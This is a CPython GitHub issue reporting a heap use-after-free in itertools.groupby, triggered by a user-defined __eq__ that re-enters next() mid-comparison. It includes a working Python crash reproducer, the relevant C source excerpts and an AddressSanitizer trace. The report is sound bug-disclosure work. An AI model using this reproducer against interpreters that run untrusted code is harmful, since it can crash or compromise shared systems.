Skip to content

Use-after-free in itertools.groupby via re-entrant key comparison through __eq__ #143543

@jackfromeast

Description

@jackfromeast

What happened?

groupby_next compares the current and target keys with PyObject_RichCompareBool while holding pointers to the active key/value pair. A user-defined __eq__ can call back into next(groupby) mid-compare, advancing the iterator, replacing currkey/currvalue, and dereferencing the objects still in use by the outer compare. The outer compare then dereferences freed memory, crashing in _Py_IsImmortal.

Proof of Concept:

from itertools import groupby


class Key(bytearray):
    seen = False

    def __init__(self, is_first):
        self.is_first = is_first

    def __eq__(self, other):
        global G
        if self.is_first and not Key.seen:
            Key.seen = True
            next(G)
            return NotImplemented
        return False


def keys():
    yield Key(True)
    while True:
        yield Key(False)


G = groupby([None, 1], keys().send)
next(G)
next(G)

Vulnerable Code Snippet:

Click to expand
/* Buggy Re-entrant Path */
static PyObject *
builtin_next(PyObject *self, PyObject *const *args, Py_ssize_t nargs)
{
    PyObject *it, *res;
    /* ... */
    it = args[0];
    res = (*Py_TYPE(it)->tp_iternext)(it);
    /* ... */
    return res;
}

static PyObject *
groupby_next(PyObject *op)
{
    PyObject *r, *grouper;
    groupbyobject *gbo = groupbyobject_CAST(op);

    gbo->currgrouper = NULL;
    /* skip to next iteration group */
    for (;;) {
        if (gbo->currkey == NULL)
            /* pass */;
        else if (gbo->tgtkey == NULL)
            break;
        else {
            int rcmp;

            rcmp = PyObject_RichCompareBool(gbo->tgtkey, gbo->currkey, Py_EQ);  /* crashing pointer derived */
            if (rcmp == -1)
                return NULL;
            else if (rcmp == 0)
                break;
        }

        if (groupby_step(gbo) < 0)
            return NULL;
    }
    Py_INCREF(gbo->currkey);
    Py_XSETREF(gbo->tgtkey, gbo->currkey);

    grouper = _grouper_create(gbo, gbo->tgtkey);
    if (grouper == NULL)
        return NULL;

    r = PyTuple_Pack(2, gbo->currkey, grouper);
    Py_DECREF(grouper);
    return r;
}

static PyObject *
slot_tp_richcompare(PyObject *self, PyObject *other, int op)
{
    PyObject *res = _PyObject_MaybeCallSpecialOneArg(self, name_op[op], other);  /* Reentrant call site */
    /* ... */
    return res;
}

static inline Py_ALWAYS_INLINE int _Py_IsImmortal(PyObject *op)
{
#if SIZEOF_VOID_P > 4
    return _Py_CAST(PY_INT32_T, op->ob_refcnt) < 0;  /* Crash site */
#else
    return op->ob_refcnt >= _Py_IMMORTAL_MINIMUM_REFCNT;
#endif
}

/* Clobbering Path */
Py_LOCAL_INLINE(int)
groupby_step(groupbyobject *gbo)
{
    PyObject *newvalue, *newkey, *oldvalue;
    /* ... */
    oldvalue = gbo->currvalue;
    gbo->currvalue = newvalue;
    Py_XSETREF(gbo->currkey, newkey);  /* state mutate site */
    Py_XDECREF(oldvalue);
    return 0;
}

Sanitizer Output:

Click to expand
=================================================================
==252399==ERROR: AddressSanitizer: heap-use-after-free on address 0x51300001d3a0 at pc 0x5a6a780142bb bp 0x7fffd4fe72a0 sp 0x7fffd4fe7290
READ of size 4 at 0x51300001d3a0 thread T0
    #0 0x5a6a780142ba in _Py_IsImmortal Include/refcount.h:127
    #1 0x5a6a780142ba in _PyStackRef_FromPyObjectNew Include/internal/pycore_stackref.h:632
    #2 0x5a6a780142ba in _PyEval_Vector Python/ceval.c:1983
    #3 0x5a6a77e475e2 in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #4 0x5a6a77e475e2 in vectorcall_unbound Objects/typeobject.c:3033
    #5 0x5a6a77e475e2 in maybe_call_special_one_arg Objects/typeobject.c:3175
    #6 0x5a6a77e475e2 in _PyObject_MaybeCallSpecialOneArg Objects/typeobject.c:3190
    #7 0x5a6a77e475e2 in slot_tp_richcompare Objects/typeobject.c:10729
    #8 0x5a6a77db94df in do_richcompare Objects/object.c:1065
    #9 0x5a6a77db94df in PyObject_RichCompare Objects/object.c:1108
    #10 0x5a6a77db94df in PyObject_RichCompareBool Objects/object.c:1130
    #11 0x5a6a782cb6ad in groupby_next Modules/itertoolsmodule.c:549
    #12 0x5a6a77ff5d8a in builtin_next Python/bltinmodule.c:1681
    #13 0x5a6a77c953e7 in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #14 0x5a6a77c953e7 in PyObject_Vectorcall Objects/call.c:327
    #15 0x5a6a77b495a2 in _PyEval_EvalFrameDefault Python/generated_cases.c.h:1620
    #16 0x5a6a78013ad6 in _PyEval_EvalFrame Include/internal/pycore_ceval.h:121
    #17 0x5a6a78013ad6 in _PyEval_Vector Python/ceval.c:2001
    #18 0x5a6a78013ad6 in PyEval_EvalCode Python/ceval.c:884
    #19 0x5a6a7815916e in run_eval_code_obj Python/pythonrun.c:1365
    #20 0x5a6a7815916e in run_mod Python/pythonrun.c:1459
    #21 0x5a6a7815de17 in pyrun_file Python/pythonrun.c:1293
    #22 0x5a6a7815de17 in _PyRun_SimpleFileObject Python/pythonrun.c:521
    #23 0x5a6a7815e93c in _PyRun_AnyFileObject Python/pythonrun.c:81
    #24 0x5a6a781d1e3c in pymain_run_file_obj Modules/main.c:410
    #25 0x5a6a781d1e3c in pymain_run_file Modules/main.c:429
    #26 0x5a6a781d1e3c in pymain_run_python Modules/main.c:691
    #27 0x5a6a781d371e in Py_RunMain Modules/main.c:772
    #28 0x5a6a781d371e in pymain_main Modules/main.c:802
    #29 0x5a6a781d371e in Py_BytesMain Modules/main.c:826
    #30 0x7800fd62a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #31 0x7800fd62a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #32 0x5a6a77b6d634 in _start (/home/jackfromeast/Desktop/entropy/targets/grammar-afl++-latest/targets/cpython/python+0x206634) (BuildId: 4d105290d0ad566a4d6f4f7b2f05fbc9e317b533)

0x51300001d3a0 is located 32 bytes inside of 368-byte region [0x51300001d380,0x51300001d4f0)
freed by thread T0 here:
    #0 0x7800fdafc4d8 in free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52
    #1 0x5a6a77e268f3 in subtype_dealloc Objects/typeobject.c:2852
    #2 0x5a6a77db21d8 in _Py_Dealloc Objects/object.c:3200
    #3 0x5a6a7809da49 in Py_DECREF_MORTAL Include/internal/pycore_object.h:482
    #4 0x5a6a7809da49 in PyStackRef_XCLOSE Include/internal/pycore_stackref.h:736
    #5 0x5a6a7809da49 in _PyFrame_ClearLocals Python/frame.c:101
    #6 0x5a6a7809da49 in _PyFrame_ClearExceptCode Python/frame.c:126
    #7 0x5a6a78009052 in clear_thread_frame Python/ceval.c:1826
    #8 0x5a6a78009052 in _PyEval_FrameClearAndPop Python/ceval.c:1850
    #9 0x5a6a77b4df4c in _PyEval_EvalFrameDefault Python/generated_cases.c.h:10403
    #10 0x5a6a780142a5 in _PyEval_EvalFrame Include/internal/pycore_ceval.h:121
    #11 0x5a6a780142a5 in _PyEval_Vector Python/ceval.c:2001
    #12 0x5a6a77e475e2 in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #13 0x5a6a77e475e2 in vectorcall_unbound Objects/typeobject.c:3033
    #14 0x5a6a77e475e2 in maybe_call_special_one_arg Objects/typeobject.c:3175
    #15 0x5a6a77e475e2 in _PyObject_MaybeCallSpecialOneArg Objects/typeobject.c:3190
    #16 0x5a6a77e475e2 in slot_tp_richcompare Objects/typeobject.c:10729
    #17 0x5a6a77db92af in do_richcompare Objects/object.c:1059
    #18 0x5a6a77db92af in PyObject_RichCompare Objects/object.c:1108
    #19 0x5a6a77db92af in PyObject_RichCompareBool Objects/object.c:1130
    #20 0x5a6a782cb6ad in groupby_next Modules/itertoolsmodule.c:549
    #21 0x5a6a77ff5d8a in builtin_next Python/bltinmodule.c:1681
    #22 0x5a6a77c953e7 in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #23 0x5a6a77c953e7 in PyObject_Vectorcall Objects/call.c:327
    #24 0x5a6a77b495a2 in _PyEval_EvalFrameDefault Python/generated_cases.c.h:1620
    #25 0x5a6a78013ad6 in _PyEval_EvalFrame Include/internal/pycore_ceval.h:121
    #26 0x5a6a78013ad6 in _PyEval_Vector Python/ceval.c:2001
    #27 0x5a6a78013ad6 in PyEval_EvalCode Python/ceval.c:884
    #28 0x5a6a7815916e in run_eval_code_obj Python/pythonrun.c:1365
    #29 0x5a6a7815916e in run_mod Python/pythonrun.c:1459
    #30 0x5a6a7815de17 in pyrun_file Python/pythonrun.c:1293
    #31 0x5a6a7815de17 in _PyRun_SimpleFileObject Python/pythonrun.c:521
    #32 0x5a6a7815e93c in _PyRun_AnyFileObject Python/pythonrun.c:81
    #33 0x5a6a781d1e3c in pymain_run_file_obj Modules/main.c:410
    #34 0x5a6a781d1e3c in pymain_run_file Modules/main.c:429
    #35 0x5a6a781d1e3c in pymain_run_python Modules/main.c:691
    #36 0x5a6a781d371e in Py_RunMain Modules/main.c:772
    #37 0x5a6a781d371e in pymain_main Modules/main.c:802
    #38 0x5a6a781d371e in Py_BytesMain Modules/main.c:826
    #39 0x7800fd62a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #40 0x7800fd62a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #41 0x5a6a77b6d634 in _start (/home/jackfromeast/Desktop/entropy/targets/grammar-afl++-latest/targets/cpython/python+0x206634) (BuildId: 4d105290d0ad566a4d6f4f7b2f05fbc9e317b533)

previously allocated by thread T0 here:
    #0 0x7800fdafd9c7 in malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:69
    #1 0x5a6a77e3a88e in _PyObject_MallocWithType Include/internal/pycore_object_alloc.h:46
    #2 0x5a6a77e3a88e in _PyType_AllocNoTrack Objects/typeobject.c:2504
    #3 0x5a6a77e3aaf4 in PyType_GenericAlloc Objects/typeobject.c:2535
    #4 0x5a6a77e32118 in type_call Objects/typeobject.c:2448
    #5 0x5a6a77c939cd in _PyObject_MakeTpCall Objects/call.c:242
    #6 0x5a6a77b51f33 in _PyEval_EvalFrameDefault Python/generated_cases.c.h:1620
    #7 0x5a6a77ce9bc4 in _PyEval_EvalFrame Include/internal/pycore_ceval.h:121
    #8 0x5a6a77ce9bc4 in gen_send_ex2 Objects/genobject.c:259
    #9 0x5a6a77ce9bc4 in gen_send_ex Objects/genobject.c:301
    #10 0x5a6a77ce9bc4 in gen_send Objects/genobject.c:324
    #11 0x5a6a77c9572d in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #12 0x5a6a77c9572d in PyObject_CallOneArg Objects/call.c:395
    #13 0x5a6a782cb718 in groupby_step Modules/itertoolsmodule.c:519
    #14 0x5a6a782cb718 in groupby_next Modules/itertoolsmodule.c:556
    #15 0x5a6a77ff5d8a in builtin_next Python/bltinmodule.c:1681
    #16 0x5a6a77c953e7 in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #17 0x5a6a77c953e7 in PyObject_Vectorcall Objects/call.c:327
    #18 0x5a6a77b495a2 in _PyEval_EvalFrameDefault Python/generated_cases.c.h:1620
    #19 0x5a6a78013ad6 in _PyEval_EvalFrame Include/internal/pycore_ceval.h:121
    #20 0x5a6a78013ad6 in _PyEval_Vector Python/ceval.c:2001
    #21 0x5a6a78013ad6 in PyEval_EvalCode Python/ceval.c:884
    #22 0x5a6a7815916e in run_eval_code_obj Python/pythonrun.c:1365
    #23 0x5a6a7815916e in run_mod Python/pythonrun.c:1459
    #24 0x5a6a7815de17 in pyrun_file Python/pythonrun.c:1293
    #25 0x5a6a7815de17 in _PyRun_SimpleFileObject Python/pythonrun.c:521
    #26 0x5a6a7815e93c in _PyRun_AnyFileObject Python/pythonrun.c:81
    #27 0x5a6a781d1e3c in pymain_run_file_obj Modules/main.c:410
    #28 0x5a6a781d1e3c in pymain_run_file Modules/main.c:429
    #29 0x5a6a781d1e3c in pymain_run_python Modules/main.c:691
    #30 0x5a6a781d371e in Py_RunMain Modules/main.c:772
    #31 0x5a6a781d371e in pymain_main Modules/main.c:802
    #32 0x5a6a781d371e in Py_BytesMain Modules/main.c:826
    #33 0x7800fd62a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #34 0x7800fd62a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #35 0x5a6a77b6d634 in _start (/home/jackfromeast/Desktop/entropy/targets/grammar-afl++-latest/targets/cpython/python+0x206634) (BuildId: 4d105290d0ad566a4d6f4f7b2f05fbc9e317b533)

SUMMARY: AddressSanitizer: heap-use-after-free Include/refcount.h:127 in _Py_IsImmortal
Shadow bytes around the buggy address:
  0x51300001d100: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x51300001d180: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x51300001d200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51300001d280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51300001d300: 00 00 00 00 00 04 fa fa fa fa fa fa fa fa fa fa
=>0x51300001d380: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd
  0x51300001d400: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x51300001d480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x51300001d500: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x51300001d580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51300001d600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==252399==ABORTING

CPython versions tested on:

Details
Python Version Status Exit Code
Python 3.9.24+ (heads/3.9:111bbc15b26, Oct 28 2025, 16:51:20) ASAN 1
Python 3.10.19+ (heads/3.10:014261980b1, Oct 28 2025, 16:52:08) [Clang 18.1.3 (1ubuntu1)] ASAN 1
Python 3.11.14+ (heads/3.11:88f3f5b5f11, Oct 28 2025, 16:53:08) [Clang 18.1.3 (1ubuntu1)] ASAN 1
Python 3.12.12+ (heads/3.12:8cb2092bd8c, Oct 28 2025, 16:54:14) [Clang 18.1.3 (1ubuntu1)] ASAN 1
Python 3.13.9+ (heads/3.13:9c8eade20c6, Oct 28 2025, 16:55:18) [Clang 18.1.3 (1ubuntu1)] ASAN 1
Python 3.14.0+ (heads/3.14:2e216728038, Oct 28 2025, 16:56:16) [Clang 18.1.3 (1ubuntu1)] ASAN 1
Python 3.15.0a1+ (heads/main:f5394c257ce, Oct 28 2025, 19:29:54) [GCC 13.3.0] ASAN 1

Operating systems tested on:

Linux

Output from running 'python -VV' on the command line:

Python 3.15.0a1+ (heads/main:f5394c257ce, Oct 28 2025, 19:29:54) [GCC 13.3.0]

Metadata

Metadata

Assignees

No one assigned

    Labels

    extension-modulesC modules in the Modules dirtype-crashA hard crash of the interpreter, possibly with a core dump

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions